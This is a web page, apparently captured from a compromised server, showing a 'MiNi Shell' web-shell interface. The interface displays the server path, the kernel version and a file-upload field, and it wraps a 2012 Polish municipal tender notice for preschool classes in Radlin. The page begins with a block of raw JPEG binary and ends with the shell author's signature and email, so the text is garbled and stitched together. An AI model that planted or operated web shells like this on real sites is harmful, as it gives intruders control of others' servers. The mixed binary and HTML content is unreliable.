JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120120/19080-N-2012.html

<p class="kh_header"><b>Radlin: Prowadzenie zajęć edukacyjnych z wychowankami przedszkoli w ramach projektu PRZEDSZKOLE DLA WSZYSTKICH z podziałem na 7 zadań</b><br>
<b>Numer ogłoszenia: 19080 - 2012; data zamieszczenia: 20.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Obsługi Placówek Oświatowych w Radlinie , ul. Józefa Rymera 15, 44-310 Radlin, woj. śląskie, tel. 032 4590232, faks 032 4590205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.radlin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć edukacyjnych z wychowankami przedszkoli w ramach projektu PRZEDSZKOLE DLA WSZYSTKICH z podziałem na 7 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi edukacyjne związane z prowadzeniem zajęć edukacyjnych w ramach projektu pod nazwą PRZEDSZKOLE DLA WSZYSTKICH. Projekt jest dofinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.1 - Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej.
2.Usługi będą realizowane z wychowankami przedszkoli z terenu Radlina. Usługi będą wykonywane od poniedziałku do piątku, w dni zajęć przedszkolnych, do lutego do 31 sierpnia 2012 roku.
3. Szczegółowe terminy realizacji poszczególnych określa pkt I.5 SIWZ i umowa. Wychowankowie będą uczestniczyć w zajęciach objętych projektem na terenie następujących przedszkoli w Radlinie:
1)Przedszkole Publiczne  Nr 1 w Radlinie ul. Reymonta 9,
2)Przedszkole Publiczne Nr 2 w Radlinie ul. Mielęckiego 13
3)Przedszkole Publiczne Nr 3 w Radlinie ul. Mariacka 1
4.Przedmiot zamówienia obejmuje prowadzenie zajęć przedszkolnych z języka angielskiego i rytmiki oraz zajęć specjalistycznych z logopedą i psychologiem. Ze względu na wiek wychowanków zajęcia mogą odbywać się w jednostkach półgodzinnych, czyli 1 godzina zajęć to dwie jednostki półgodzinne).
5.Zamawiający dopuszcza możliwość składania ofert częściowych, na poszczególne zadania:
1)zadanie nr 1 - dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 1 w Radlinie  - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 4 godzin tygodniowo, średnio 16 godzin miesięcznie- łącznie, maksymalnie, 112 godzin zajęć, realizowanych w następujących dniach tygodnia:
a)Poniedziałki - godz. 13.30 - 14.00 - 0,5 godz.
Godz. 15.00 - 15.30 - 0,5 godz.
 Godz. 16.00 - 16.30 - 0,5 godz.
 Godz. 17.00 - 17.30 - 0,5 godz.
b)Środy - godz. 13.30 - 14.00 - 0,5 godz.
Godz. 15.00 - 15.30 - 0,5 godz.
Godz. 16.00 - 16.30 - 0,5 godz.
Godz. 17.00 - 17.30 - 0,5 godz.
2)zadanie nr 2 - dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 1 w Radlinie  - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 11 godzin tygodniowo, średnio 44 godziny miesięcznie- łącznie, maksymalnie, 308 godzin zajęć , realizowane w następujących dniach tygodnia:
a)Poniedziałki - godz. 9.00 - 11.00 - 2 godz.
b)Wtorki - godz. 13.00 - 15.00 - 2 godz.
c)Środy - godz. 10.00 - 13.00 - 3 godz.
d)Czwartek - godz. 13.00 - 17.00 - 4 godz.
3)zadanie nr 3 - dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 1 w Radlinie - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 5 godzin tygodniowo,, średnio 20 godzin miesięcznie- łącznie, maksymalnie, 140 godzin zajęć, realizowane w następujących dniach tygodnia:
a)Piątki - godz. 9.00 - 14.00 - 5 godz.
4)zadanie nr 4 - dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 2 w Radlinie  - dla 4 grup (grupa ok. 25 dzieci) w łącznym wymiarze 9 godzin tygodniowo, średnio 36 godzin miesięcznie- łącznie, maksymalnie, 252 godziny zajęć, realizowanych w następujących dniach tygodnia:
a)Poniedziałki - godz. 14.00 - 15.00 - 1 godz.
b)Wtorki - godz. 14.00 - 15.00 - 1 godz.
c)Środy - godz. 13.00 - 16.00 - 3 godz.
5)zadanie nr 5 - dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 2 w Radlinie - dla 4 grup (grupa ok. 25 dzieci) w łącznym wymiarze 7 godzin tygodniowo,, średnio 28 godzin miesięcznie- łącznie, maksymalnie, 196 godzin zajęć,  realizowanych w następujących dniach tygodnia:
a)Poniedziałki - godz. 12.30 - 14.00 - 1,5godz.
b)Wtorki - godz. 14.00 - 15.30 - 1,5 godz.
c)Środy - godz.12.30 - 14.00 - 1,5 godz.
d)Czwartki - godz. 14.00 - 15.30 - 1,5 godz.
e)Piątki - godz. 12.30 - 13.30 - 1 godz.
6)zadanie nr 6 - dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 3 w Radlinie  - dla 5 grup (grupa ok. 25 dzieci) w łącznym wymiarze 19 godzin tygodniowo, średnio 76 godzin miesięcznie- łącznie, maksymalnie, 532 godziny zajęć,  realizowanych w następujących dniach tygodnia:
a)Poniedziałki - godz. 13.00 - 17.00 - 4 godz.
b)Wtorki - godz. 13.00 - 17.00 - 4 godz.
c)Środy - godz. 13.00 - 17.00 - 4 godz.
d)Czwartki - godz. 13.00 - 16.30 - 3,5 godz.
e)Piątki - godz. 13.30 - 16.30 - 3,5 godz.
7)zadanie nr 7 - dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 3 w Radlinie - dla 5 grup (grupa ok. 25 dzieci) w łącznym wymiarze 10 godzin tygodniowo,, średnio 40 godzin miesięcznie- łącznie, maksymalnie, 280 godzin zajęć,  realizowanych w następujących dniach tygodnia:
a)Poniedziałki - godz. 13.00 - 14.00 - 1 godz.
                        Godz. 16.00 - 17.00 - 1 godz.
b)Wtorki - godz. 13.00 - 15.00 - 2 godz.
             Godz. 16.00 - 17.00 - 1 godz.
c)Środy - godz. 13.00 - 15.00 - 2 godz.
d)Czwartki - godz. 13.00 - 15.00 - 2 godz.
e)Piątki - godz. 14.00 - 15.00 - 1 godz.
6.Zamówienie jest zamówieniem maksymalnym. Ostateczna ilości zajęć objętych zamówieniem w okresie ferii letnich (lipiec-sierpień 2012r)  może się nieznacznie zmniejszyć, zależeć będą od rzeczywistych potrzeb Zamawiającego, które w decydującym stopniu zależą od ilości faktycznych uczestników zajęć.
7.Wykonawca może złożyć ofertę na jedno lub więcej zadań. Ocenie podlega każde zadanie osobno. Wykonawca w druku oferty wypełnia tylko rubryki tego zadania, które jest przedmiotem jego zainteresowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się do wykonania zamówienia winien dysponować osobami, spełniającymi następujące warunki:
1)Dla zadań nr 1 i nr 4:
a)ukończone studia wyższe muzyczne z przygotowaniem pedagogicznym, minimum na poziomie legitymowania się stopniem licencjata oraz umiejętność gry na instrumencie klawiszowym,  albo ukończoną szkołę muzyczną II stopnia oraz umiejętność gry na instrumencie klawiszowym, albo ukończone studia wyższe z przygotowaniem pedagogicznym, minimum na poziomie legitymowania się stopniem licencjata, na kierunku wychowanie przedszkolne oraz umiejętność gry na instrumencie klawiszowym albo ukończony zakład kształcenia nauczycieli na kierunku wychowania przedszkolnego oraz umiejętność gry na instrumencie klawiszowym,
b)posiada pełną zdolność do czynności prawnych, korzysta z pełnych praw publicznych oraz nie był karany za przestępstwo popełnione umyślnie.
2)Dla zadań nr 2 i nr 6 :
a)wykształcenie wyższe, minimum na poziomie legitymowania się stopniem licencjata na kierunku logopedii albo wyższe studia na dowolnym kierunku i podyplomowe studia na kierunku logopedii
b)posiada pełną zdolność do czynności prawnych, korzysta z pełnych praw publicznych oraz nie był karany za przestępstwo popełnione umyślnie.
3)Dla zadań nr 3, nr 5, nr 7:
a)ukończone studia wyższe psychologiczne, albo wyższe wykształcenie pedagogiczne i ukończone podyplomowe studia psychologiczne
b)posiada pełną zdolność do czynności prawnych, korzysta z pełnych praw publicznych oraz nie był karany za przestępstwo popełnione umyślnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oświadczenie o sposobie realizacji zamówienia, że oferowany przedmiot zamówienia będzie realizowany przez tą samą osobę w ramach jednego zadania (wzór - zał. Nr 2 do SIWZ)
2)wykaz osób, które będą uczestniczyć w realizacji zamówienia wraz z oświadczeniem o posiadanych kwalifikacjach (wzór - zał. Nr 5 do SIWZ),
3)oświadczenie o niekaralności osoby bezpośrednio wykonującej zamówienie (wzór - zał. Nr 6 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaistnienia okoliczności polegających na:
1)zmianie terminów realizacji zamówienia z powodów przerwy w funkcjonowaniu przedszkola uniemożliwiającej realizację zamówienia, niezależnej od Wykonawcy, 
2)Zmianie prowadzącego zajęcia, ze względu na jego dłuższą nieobecność (macierzyństwo, choroba, itp. zdarzenia losowe)
3)zmianie planu zajęć przedszkola.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.radlin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Obsługi Placówek Oświatowych w Radlinie; 44-310 Radlin, ul. Rymera 15 (budynek Urzędu Miasta Radlin, III piętro, pokój 401 lub 408).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2012 godzina 10:00, miejsce: Miejski Zespół Obsługi Placówek Oświatowych w Radlinie; 44-310 Radlin, ul. Rymera 15 (budynek Urzędu Miasta Radlin, III piętro, pokój 408).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt PRZEDSZKOLE DLA WSZYSTKICH jest współfinansowany przez Unię Europejską, ze środków Europejskiego Funduszu Społecznego, w ramach priorytetu IX, działania 9.1, poddziałania 9.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 1 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 1 w Radlinie  - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 4 godzin tygodniowo, średnio 16 godzin miesięcznie- łącznie, maksymalnie, 112 godzin zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 1 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 1 w Radlinie  - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 11 godzin tygodniowo, średnio 44 godziny miesięcznie- łącznie, maksymalnie, 308 godzin zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 1 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 1 w Radlinie - dla 3 grup (grupa ok. 25 dzieci) w łącznym wymiarze 5 godzin tygodniowo, średnio 20 godzin miesięcznie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 2 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z rytmiki w Przedszkolu Publicznym Nr 2 w Radlinie  - dla 4 grup (grupa ok. 25 dzieci) w łącznym wymiarze 9 godzin tygodniowo, średnio 36 godzin miesięcznie- łącznie, maksymalnie, 252 godziny zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 2 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 2 w Radlinie - dla 4 grup (grupa ok. 25 dzieci) w łącznym wymiarze 7 godzin tygodniowo,, średnio 28 godzin miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 3 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z logopedą w Przedszkolu Publicznym Nr 3 w Radlinie  - dla 5 grup (grupa ok. 25 dzieci) w łącznym wymiarze 19 godzin tygodniowo, średnio 76 godzin miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 3 w Radlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia z psychologiem w Przedszkolu Publicznym Nr 3 w Radlinie - dla 5 grup (grupa ok. 25 dzieci) w łącznym wymiarze 10 godzin tygodniowo, średnio 40 godzin miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com